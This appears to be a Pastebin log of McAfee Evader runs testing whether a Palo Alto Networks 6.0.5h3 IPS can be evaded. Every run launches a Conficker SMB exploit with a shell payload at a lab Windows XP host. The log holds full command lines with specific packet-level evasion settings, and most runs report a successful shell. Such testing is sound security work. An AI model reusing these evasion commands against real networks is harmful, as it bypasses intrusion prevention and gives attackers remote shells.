API tools faq
paste
Advertisement
netsecvulns

Palo Alto Networks 6.0.5h3 IPS evasion techniques with Mcafe

netsecvulns
Oct 27th, 2014
1,165
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 31.15 KB | None | 0 0
raw download clone embed print report
  1. Palo Alto Networks 6.0.5h3 IPS evasion techniques with Mcafee Evader
  2.  
  3. Running exploit with command "ruby mongbat.rb --uid=webgui2_8000 --attack=conficker --payload=shell --check_victim=false --iface=eth0 --attacker=10.62.90.75 --victim=10.35.1.207 --gw=10.62.90.3 --mode=random --time=43200 --workers=14 --min_evasions=2 --max_evasions=2 --passthrough --verifydelay=1000"
  4. 2014-10-27 15:22:24 INFO Using binary /root/evader/evader version 2013.2.586 ( x86, o, evc4 )
  5. 2014-10-27 15:22:24 INFO Victim check disabled - will NOT notice if victim is no longer running
  6. 2014-10-27 15:22:26 INFO Using rand seed JQq8JjefWhc=
  7. 2014-10-27 15:22:26 INFO External Validator: /root/evader/externals/conficker_validator.rb: Validate Conficker against Windows XP SP2
  8. Starting evasions generator: Random evasions generator (Evasion adding percentage is 0.0028169014084507044)
  9.  
  10. 0 runs averaging 0.00 runs / second ; progress: 1/43200.........................2014-10-27 15:22:31 INFO
  11. Success. (10.62.90.85):
  12. /root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.85 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=30734 --extra=bindport=10010 --verifydelay=200 --obfuscate --randseed=dkmOr3BFy8E --evasion=[smb_opentree,end]smb_decoytrees,"5","3","8","random_msrpcbind" --evasion=[smb_openpipe,msrpc_bind]tcp_chaff,"2","chksum|nullchksum|shorthdr|longhdr","random_alphanum" --verifydelay=1000 --payload=shell
  13. Info: Using random seed dkmOr3BFy8F
  14. The following evasions are applied from stage smb_opentree to end:
  15. - Before normal SMB writes, 5 SMB trees are opened and 3 writes are performed to them. The write payload is 8 bytes of MSRPC bind-like data.
  16. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  17. - With every 2 TCP packet a TCP chaff packet is sent. The chaff packet has:
  18. * Invalid TCP checksum.
  19. * NULL TCP checksum.
  20. * TCP header shorter than 20 bytes
  21. * TCP header longer than packet total size
  22. * Duplicate packet has random alphanumeric bytes as payload
  23.  
  24. Info: NetBIOS connection 10.62.90.85:30734 -> 10.35.1.207:445
  25. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  26. Info: Sending MSRPC request with exploit
  27. Info: Shell found, attack succeeded
  28. Info: Shell closed
  29. 0: Success.
  30. .....................
  31. 47 runs averaging 7.21 runs / second ; progress: 7/43200............................
  32. 75 runs averaging 6.42 runs / second ; progress: 12/43200...............................
  33. 106 runs averaging 6.31 runs / second ; progress: 17/43200.......................................
  34. 145 runs averaging 6.63 runs / second ; progress: 22/43200..................................
  35. 179 runs averaging 6.63 runs / second ; progress: 27/43200..........................
  36. 205 runs averaging 6.40 runs / second ; progress: 32/43200.....................2014-10-27 15:23:03 INFO
  37. Success. (10.62.90.84):
  38. /root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.84 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=61157 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=DHLLZZ7NwVU --evasion=[smb_connect,msrpc_bind]ipv4_frag,"48" --evasion=[netbios_connect,msrpc_req]tcp_paws,"75%","268435454","random_alpha" --verifydelay=1000 --payload=shell
  39. Info: Using random seed DHLLZZ7NwVU
  40. The following evasions are applied from stage netbios_connect to msrpc_req:
  41. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has random alpha bytes as payload
  42. The following evasions are applied from stage smb_connect to msrpc_bind:
  43. - IPv4 fragments with at most 48 bytes per fragment
  44.  
  45. Info: NetBIOS connection 10.62.90.84:61157 -> 10.35.1.207:445
  46. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  47. Info: Sending MSRPC request with exploit
  48. Info: Shell found, attack succeeded
  49. Info: Shell closed
  50. 0: Success.
  51. .2014-10-27 15:23:03 INFO
  52. Success. (10.62.90.85):
  53. /root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.85 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=39930 --extra=bindport=10010 --verifydelay=200 --obfuscate --randseed=cusywtjt92o --evasion=[smb_opentree,end]smb_writeandxpad,"10","zero" --evasion=[smb_openpipe,msrpc_req]tcp_chaff,"2","nullflag","alpharandomized" --verifydelay=1000 --payload=shell
  54. Info: Using random seed cusywtjt92p
  55. The following evasions are applied from stage smb_opentree to end:
  56. - 10 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of zero bytes.
  57. The following evasions are applied from stage smb_openpipe to msrpc_req:
  58. - With every 2 TCP packet a TCP chaff packet is sent. The chaff packet has:
  59. * NULL TCP control flags.
  60. * Duplicate packet has original payload with alphabetic bytes randomized
  61.  
  62. Info: NetBIOS connection 10.62.90.85:39930 -> 10.35.1.207:445
  63. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  64. Info: Sending MSRPC request with exploit
  65. Info: Shell found, attack succeeded
  66. Info: Command shell connection reset.
  67. Info: CommandShell::SendCommand() - Failed to send string
  68. Info: Shell closed
  69. 0: Success.
  70. ..
  71. 231 runs averaging 6.22 runs / second ; progress: 37/43200................................
  72. 263 runs averaging 6.23 runs / second ; progress: 42/43200..........2014-10-27 15:23:11 INFO
  73. Success. (10.62.90.79):
  74. /root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.79 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=15672 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=HZ3Sa7z//Is --evasion=[smb_opentree,smb_openpipe]ipv4_opt,"21","inc","shuffletcp" --evasion=[smb_connect,msrpc_req]tcp_paws,"50%","268435454","random_alphanum" --verifydelay=1000 --payload=shell
  75. Info: Using random seed HZ3Sa7z//Is
  76. The following evasions are applied from stage smb_connect to msrpc_req:
  77. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has random alphanumeric bytes as payload
  78. The following evasions are applied from stage smb_opentree to smb_openpipe:
  79. - Every 21th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  80. The duplicate packet has shuffled TCP payload
  81.  
  82. Info: NetBIOS connection 10.62.90.79:15672 -> 10.35.1.207:445
  83. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  84. Info: Sending MSRPC request with exploit
  85. Info: Shell found, attack succeeded
  86. Info: CommandShell::SendCommand() - Failed to send string
  87. Info: Command shell connection reset.
  88. Info: Shell closed
  89. 0: Success.
  90. .............2014-10-27 15:23:13 INFO
  91. Success. (10.62.90.79):
  92. /root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.79 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=17963 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=B6RhIk0V4V8 --evasion=[smb_connect,end]tcp_paws,"75%","9","random_alpha" --evasion=[smb_connect,msrpc_bind]tcp_segvar,"4","53977" --verifydelay=1000 --payload=shell
  93. Info: Using random seed B6RhIk0V4V8
  94. The following evasions are applied from stage smb_connect to end:
  95. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has random alpha bytes as payload
  96. The following evasions are applied from stage smb_connect to msrpc_bind:
  97. - TCP packets are segmented to contain between 4 and 53977 bytes of payload.
  98.  
  99. Info: NetBIOS connection 10.62.90.79:17963 -> 10.35.1.207:445
  100. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  101. Info: Sending MSRPC request with exploit
  102. Info: Shell found, attack succeeded
  103. Info: Command shell connection reset.
  104. Info: CommandShell::SendCommand() - Failed to send string
  105. Info: Shell closed
  106. 0: Success.
  107. ....................
  108. 308 runs averaging 6.44 runs / second ; progress: 48/43200...........................
  109. 335 runs averaging 6.33 runs / second ; progress: 53/43200....................
  110. 355 runs averaging 6.12 runs / second ; progress: 58/43200......
  111. 361 runs averaging 5.72 runs / second ; progress: 63/43200..2014-10-27 15:23:31 INFO
  112. Success. (10.62.90.84):
  113. /root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.84 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37695 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=93wLI55/9xM --evasion=[smb_connect,msrpc_req]netbios_chaff,"2","empty_unspec|small_unspec|broken_length" --evasion=[start,msrpc_req]tcp_chaff,"1","nullflag","random" --verifydelay=1000 --payload=shell
  114. Info: Using random seed 93wLI55/9xP
  115. The following evasions are applied from stage start to msrpc_req:
  116. - With every 1 TCP packet a TCP chaff packet is sent. The chaff packet has:
  117. * NULL TCP control flags.
  118. * Duplicate packet has random bytes as payload
  119. The following evasions are applied from stage smb_connect to msrpc_req:
  120. - Before every 2th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
  121.  
  122. Info: NetBIOS connection 10.62.90.84:37695 -> 10.35.1.207:445
  123. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  124. Info: Sending MSRPC request with exploit
  125. Info: Shell found, attack succeeded
  126. Info: CommandShell::SendCommand() - Failed to send string
  127. Info: Command shell connection reset.
  128. Info: Shell closed
  129. 0: Success.
  130. ..............
  131. 378 runs averaging 5.55 runs / second ; progress: 68/43200......................
  132. 400 runs averaging 5.47 runs / second ; progress: 73/43200..2014-10-27 15:23:40 INFO
  133. Success. (10.62.90.79):
  134. /root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.79 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=14521 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=20G1uxuzLX0 --evasion=[smb_connect,smb_openpipe]smb_chaff,"21","write_flag","msrpc" --evasion=[smb_opentree,end]tcp_paws,"5","146896369","random" --verifydelay=1000 --payload=shell
  135. Info: Using random seed 20G1uxuzLX3
  136. The following evasions are applied from stage smb_connect to smb_openpipe:
  137. - Before every 21th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
  138. The following evasions are applied from stage smb_opentree to end:
  139. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 146896369> and has random bytes as payload
  140.  
  141. Info: NetBIOS connection 10.62.90.79:14521 -> 10.35.1.207:445
  142. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  143. Info: Sending MSRPC request with exploit
  144. Info: Shell found, attack succeeded
  145. Info: Shell closed
  146. 0: Success.
  147. ...............2014-10-27 15:23:43 INFO
  148. Success. (10.62.90.84):
  149. /root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.84 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33059 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=yCX702BvsoY --evasion=[start,msrpc_req]tcp_paws,"75%","268435454","random_alpha" --evasion=[smb_opentree,msrpc_req]tcp_paws,"13","268435455","random_alpha" --verifydelay=1000 --payload=shell
  150. Info: Using random seed yCX702Bvsob
  151. The following evasions are applied from stage start to msrpc_req:
  152. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has random alpha bytes as payload
  153. The following evasions are applied from stage smb_opentree to msrpc_req:
  154. - Every 13th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random alpha bytes as payload
  155.  
  156. Info: NetBIOS connection 10.62.90.84:33059 -> 10.35.1.207:445
  157. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  158. Info: Sending MSRPC request with exploit
  159. Info: Shell found, attack succeeded
  160. Info: Shell closed
  161. 0: Success.
  162. ..............
  163. 433 runs averaging 5.53 runs / second ; progress: 78/43200....................
  164. 453 runs averaging 5.44 runs / second ; progress: 83/432002014-10-27 15:23:50 INFO
  165. Success. (10.62.90.87):
  166. /root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.87 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=63063 --extra=bindport=10012 --verifydelay=200 --obfuscate --randseed=BGefIIMzPSI --evasion=[smb_connect,msrpc_bind]tcp_chaff,"13","chksum|nullchksum|nullflag","random_alpha" --evasion=[smb_opentree,msrpc_req]tcp_paws,"1","4","random" --verifydelay=1000 --payload=shell
  167. Info: Using random seed BGefIIMzPSI
  168. The following evasions are applied from stage smb_connect to msrpc_bind:
  169. - With every 13 TCP packet a TCP chaff packet is sent. The chaff packet has:
  170. * Invalid TCP checksum.
  171. * NULL TCP checksum.
  172. * NULL TCP control flags.
  173. * Duplicate packet has random alpha bytes as payload
  174. The following evasions are applied from stage smb_opentree to msrpc_req:
  175. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has random bytes as payload
  176.  
  177. Info: NetBIOS connection 10.62.90.87:63063 -> 10.35.1.207:445
  178. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  179. Info: Sending MSRPC request with exploit
  180. Info: Shell found, attack succeeded
  181. Info: Shell closed
  182. 0: Success.
  183. ...............
  184. 469 runs averaging 5.31 runs / second ; progress: 88/43200.................
  185. 486 runs averaging 5.21 runs / second ; progress: 93/43200.......................
  186. 509 runs averaging 5.17 runs / second ; progress: 98/43200..................
  187. 527 runs averaging 5.10 runs / second ; progress: 103/432002014-10-27 15:24:10 INFO
  188. Success. (10.62.90.81):
  189. /root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.81 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=21544 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=WcNFwRScpy0 --evasion=[start,end]tcp_paws,"1","18663179","unmodified" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"2","28078968","random" --verifydelay=1000 --payload=shell
  190. Info: Using random seed WcNFwRScpy1
  191.  
  192. The following evasions are applied from stage smb_openpipe to msrpc_req:
  193. - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 28078968> and has random bytes as payload
  194.  
  195. Info: NetBIOS connection 10.62.90.81:21544 -> 10.35.1.207:445
  196. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  197. Info: Sending MSRPC request with exploit
  198. Info: Shell found, attack succeeded
  199. Info: Shell closed
  200. 0: Success.
  201. .........
  202. 537 runs averaging 4.95 runs / second ; progress: 108/43200...................
  203. 556 runs averaging 4.90 runs / second ; progress: 113/43200....................
  204. 576 runs averaging 4.86 runs / second ; progress: 119/43200......2014-10-27 15:24:26 INFO
  205. Success. (10.62.90.85):
  206. /root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.85 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=29127 --extra=bindport=10010 --verifydelay=200 --obfuscate --randseed=blBNPp/vvrI --evasion=[smb_opentree,end]smb_decoytrees,"1","6","9","zero" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"2","268435453","alpharandomized" --verifydelay=1000 --payload=shell
  207. Info: Using random seed blBNPp/vvrJ
  208. The following evasions are applied from stage smb_opentree to end:
  209. - Before normal SMB writes, 1 SMB trees are opened and 6 writes are performed to them. The write payload is 9 bytes of zeroes.
  210. The following evasions are applied from stage smb_openpipe to msrpc_req:
  211. - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has original payload with alphabetic bytes randomized
  212.  
  213. Info: NetBIOS connection 10.62.90.85:29127 -> 10.35.1.207:445
  214. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  215. Info: Sending MSRPC request with exploit
  216. Info: Shell found, attack succeeded
  217. Info: CommandShell::SendCommand() - Failed to send string
  218. Info: Command shell connection reset.
  219. Info: Shell closed
  220. 0: Success.
  221. ..............
  222. 597 runs averaging 4.83 runs / second ; progress: 124/43200.......................
  223. 620 runs averaging 4.82 runs / second ; progress: 129/43200.............................
  224. 649 runs averaging 4.86 runs / second ; progress: 134/43200.......2014-10-27 15:24:42 INFO
  225. Success. (10.62.90.85):
  226. /root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.85 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=36155 --extra=bindport=10010 --verifydelay=200 --obfuscate --randseed=wP2OpZACf7k --evasion=[msrpc_req,end]tcp_chaff,"2","shorthdr|longhdr","random_alpha" --evasion=[start,end]tcp_paws,"3","268435455","random_alpha" --verifydelay=1000 --payload=shell
  227. Info: Using random seed wP2OpZACf7n
  228. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random alpha bytes as payload
  229. The following evasions are applied from stage msrpc_req to end:
  230. - With every 2 TCP packet a TCP chaff packet is sent. The chaff packet has:
  231. * TCP header shorter than 20 bytes
  232. * TCP header longer than packet total size
  233. * Duplicate packet has random alpha bytes as payload
  234.  
  235. Info: NetBIOS connection 10.62.90.85:36155 -> 10.35.1.207:445
  236. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  237. Info: Sending MSRPC request with exploit
  238. Info: Shell found, attack succeeded
  239. Info: CommandShell::SendCommand() - Failed to send string
  240. Info: Command shell connection reset.
  241. Info: Shell closed
  242. 0: Success.
  243. ....................
  244. 677 runs averaging 4.88 runs / second ; progress: 139/43200...2014-10-27 15:24:46 INFO
  245. Success. (10.62.90.88):
  246. /root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.88 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=21972 --extra=bindport=10013 --verifydelay=200 --obfuscate --randseed=Q9f2ifNXKts --evasion=[smb_openpipe,end]netbios_chaff,"1","empty_keepalive|small_unspec|msrpc_req|broken_length" --evasion=[msrpc_bind,end]tcp_paws,"1","268435453","zero" --verifydelay=1000 --payload=shell
  247. Info: Using random seed Q9f2ifNXKtt
  248. The following evasions are applied from stage smb_openpipe to end:
  249. - Before every 1th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
  250. The following evasions are applied from stage msrpc_bind to end:
  251. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has 0x00 bytes as payload
  252.  
  253. Info: NetBIOS connection 10.62.90.88:21972 -> 10.35.1.207:445
  254. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  255. Info: Sending MSRPC request with exploit
  256. Info: Shell found, attack succeeded
  257. Info: Shell closed
  258. 0: Success.
  259. .....................
  260. 702 runs averaging 4.88 runs / second ; progress: 144/43200................
  261. 718 runs averaging 4.82 runs / second ; progress: 149/43200........
  262. 726 runs averaging 4.71 runs / second ; progress: 154/43200
  263. 726 runs averaging 4.57 runs / second ; progress: 159/43200.........
  264. 735 runs averaging 4.48 runs / second ; progress: 164/43200................
  265. 751 runs averaging 4.44 runs / second ; progress: 169/43200.......
  266. 758 runs averaging 4.35 runs / second ; progress: 174/43200...
  267. 761 runs averaging 4.25 runs / second ; progress: 179/43200..
  268. 763 runs averaging 4.14 runs / second ; progress: 184/43200..
  269. 765 runs averaging 4.04 runs / second ; progress: 189/43200..........
  270. 775 runs averaging 3.99 runs / second ; progress: 194/43200........
  271. 783 runs averaging 3.93 runs / second ; progress: 199/43200..............
  272. 797 runs averaging 3.90 runs / second ; progress: 204/43200.........
  273. 806 runs averaging 3.85 runs / second ; progress: 209/43200...................
  274. 825 runs averaging 3.85 runs / second ; progress: 214/43200.................
  275. 842 runs averaging 3.84 runs / second ; progress: 219/43200
  276. 842 runs averaging 3.75 runs / second ; progress: 224/43200
  277. 842 runs averaging 3.67 runs / second ; progress: 229/43200......
  278. 848 runs averaging 3.62 runs / second ; progress: 234/43200.........
  279. 857 runs averaging 3.58 runs / second ; progress: 239/43200.......
  280. 864 runs averaging 3.54 runs / second ; progress: 244/43200.....
  281. 869 runs averaging 3.48 runs / second ; progress: 249/43200............
  282. 881 runs averaging 3.46 runs / second ; progress: 254/43200........
  283. 889 runs averaging 3.43 runs / second ; progress: 259/43200.........
  284. 898 runs averaging 3.40 runs / second ; progress: 264/43200.......
  285. 905 runs averaging 3.36 runs / second ; progress: 270/43200.........
  286. 914 runs averaging 3.33 runs / second ; progress: 275/43200............
  287. 926 runs averaging 3.31 runs / second ; progress: 280/43200..........
  288. 936 runs averaging 3.29 runs / second ; progress: 285/43200.
  289. 937 runs averaging 3.24 runs / second ; progress: 290/43200
  290. 937 runs averaging 3.18 runs / second ; progress: 295/43200............
  291. 949 runs averaging 3.17 runs / second ; progress: 300/43200......Pid 17651 timed out - killed
  292. 2014-10-27 15:27:28 INFO
  293. Timed out (10.62.90.83):
  294. /root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.83 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=58677 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=W+mzqbTjctM --evasion=[smb_opentree,msrpc_req]tcp_paws,"50%","6","zero" --evasion=[netbios_connect,msrpc_bind]tcp_urgent,"50%","random_alphanum" --verifydelay=1000 --payload=shell
  295. Info: Using random seed W+mzqbTjctN
  296. The following evasions are applied from stage netbios_connect to msrpc_bind:
  297. - 50% probability to add a random alphanumeric urgent data byte to a TCP segment.
  298. The following evasions are applied from stage smb_opentree to msrpc_req:
  299. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has 0x00 bytes as payload
  300.  
  301. Info: NetBIOS connection 10.62.90.83:58677 -> 10.35.1.207:445
  302. Terminated
  303. .....2014-10-27 15:27:30 INFO
  304. Success. (10.62.90.83):
  305. /root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.83 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=29264 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=3Kb05auMcgU --evasion=[smb_connect,msrpc_req]smb_decoytrees,"6","4","2","random_msrpcbind" --evasion=[smb_connect,smb_opentree]tcp_segvar,"1","37859" --verifydelay=1000 --payload=shell
  306. Info: Using random seed 3Kb05auMcgX
  307. The following evasions are applied from stage smb_connect to smb_opentree:
  308. - TCP packets are segmented to contain between 1 and 37859 bytes of payload.
  309. The following evasions are applied from stage smb_connect to msrpc_req:
  310. - Before normal SMB writes, 6 SMB trees are opened and 4 writes are performed to them. The write payload is 2 bytes of MSRPC bind-like data.
  311.  
  312. Info: NetBIOS connection 10.62.90.83:29264 -> 10.35.1.207:445
  313. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  314. Info: Sending MSRPC request with exploit
  315. Info: Shell found, attack succeeded
  316. Info: CommandShell::SendCommand() - Failed to send string
  317. Info: Command shell connection reset.
  318. Info: Shell closed
  319. 0: Success.
  320. ......
  321. 968 runs averaging 3.18 runs / second ; progress: 305/43200..............
  322. 982 runs averaging 3.17 runs / second ; progress: 310/43200.........
  323. 991 runs averaging 3.15 runs / second ; progress: 315/43200...Pid 18473 timed out - killed
  324. 2014-10-27 15:27:43 INFO
  325. Timed out (10.62.90.77):
  326. /root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.77 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=45861 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=4kN/lpcvPRQ --evasion=[msrpc_req,end]smb_chaff,"5","write_flag","msrpc" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","zero" --verifydelay=1000 --payload=shell
  327. Info: Using random seed 4kN/lpcvPRT
  328. The following evasions are applied from stage smb_opentree to msrpc_req:
  329. - Add a zero urgent data byte to every 2 TCP segment.
  330. The following evasions are applied from stage msrpc_req to end:
  331. - Before every 5th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
  332.  
  333. Info: NetBIOS connection 10.62.90.77:45861 -> 10.35.1.207:445
  334. Terminated
  335. ...2014-10-27 15:27:44 INFO
  336. Success. (10.62.90.81):
  337. /root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.81 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=31447 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=VbhSzUOE56A --evasion=[start,smb_connect]ipv4_opt,"21","inc","shuffletcp" --evasion=[smb_opentree,msrpc_req]tcp_paws,"50%","639943","alpharandomized" --verifydelay=1000 --payload=shell
  338. Info: Using random seed VbhSzUOE56B
  339. The following evasions are applied from stage start to smb_connect:
  340. - Every 21th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  341. The duplicate packet has shuffled TCP payload
  342. The following evasions are applied from stage smb_opentree to msrpc_req:
  343. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 639943> and has original payload with alphabetic bytes randomized
  344.  
  345. Info: NetBIOS connection 10.62.90.81:31447 -> 10.35.1.207:445
  346. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  347. Info: Sending MSRPC request with exploit
  348. Info: Shell found, attack succeeded
  349. Info: CommandShell::SendCommand() - Failed to send string
  350. Info: Command shell connection reset.
  351. Info: Shell closed
  352. 0: Success.
  353. .Pid 18612 timed out - killed
  354. 2014-10-27 15:27:45 INFO
  355. Timed out (10.62.90.78):
  356. /root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.78 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=58917 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=tpwjgTYiV8k --evasion=[start,end]tcp_initialseq,"2" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","zero" --verifydelay=1000 --payload=shell
  357. Info: Using random seed tpwjgTYiV8m
  358. - Initial TCP sequence number is set to 0xffffffff - 2
  359. The following evasions are applied from stage smb_opentree to msrpc_req:
  360. - Add a zero urgent data byte to every 2 TCP segment.
  361.  
  362. Info: NetBIOS connection 10.62.90.78:58917 -> 10.35.1.207:445
  363. Terminated
  364. .....Pid 18682 timed out - killed
  365. 2014-10-27 15:27:46 INFO
  366. Timed out (10.62.90.76):
  367. /root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.76 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=63099 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=wnzVAmbFo1U --evasion=[netbios_connect,smb_connect]tcp_chaff,"8","nullchksum|shorthdr","alphanumrandomized" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"25%","random_alpha" --verifydelay=1000 --payload=shell
  368. Info: Using random seed wnzVAmbFo1X
  369. The following evasions are applied from stage netbios_connect to smb_connect:
  370. - With every 8 TCP packet a TCP chaff packet is sent. The chaff packet has:
  371. * NULL TCP checksum.
  372. * TCP header shorter than 20 bytes
  373. * Duplicate packet has original payload with alphanumeric bytes randomized
  374. The following evasions are applied from stage smb_openpipe to msrpc_req:
  375. - 25% probability to add a random alphaurgent data byte to a TCP segment.
  376.  
  377. Info: NetBIOS connection 10.62.90.76:63099 -> 10.35.1.207:445
  378. Terminated
  379. .
  380. 1008 runs averaging 3.15 runs / second ; progress: 320/43200..........................
  381. 1034 runs averaging 3.18 runs / second ; progress: 325/43200..Pid 19009 timed out - killed
  382. 2014-10-27 15:27:52 INFO
  383. Timed out (10.62.90.75):
  384. /root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.75 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=61686 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=5R1r/jbFmrw --evasion=[smb_connect,smb_openpipe]ipv4_opt,"25%","inc","random_alphanum" --evasion=[smb_openpipe,end]tcp_urgent,"75%","random_alphanum" --verifydelay=1000 --payload=shell
  385. Info: Using random seed 5R1r/jbFmrz
  386. The following evasions are applied from stage smb_connect to smb_openpipe:
  387. - 25% probability to send a duplicate IPv4 packet with an incrementing DWORD in the options field.
  388. The duplicate packet has random alphanumeric bytes as payload
  389. The following evasions are applied from stage smb_openpipe to end:
  390. - 75% probability to add a random alphanumeric urgent data byte to a TCP segment.
  391.  
  392. Info: NetBIOS connection 10.62.90.75:61686 -> 10.35.1.207:445
  393. Terminated
  394. ..........
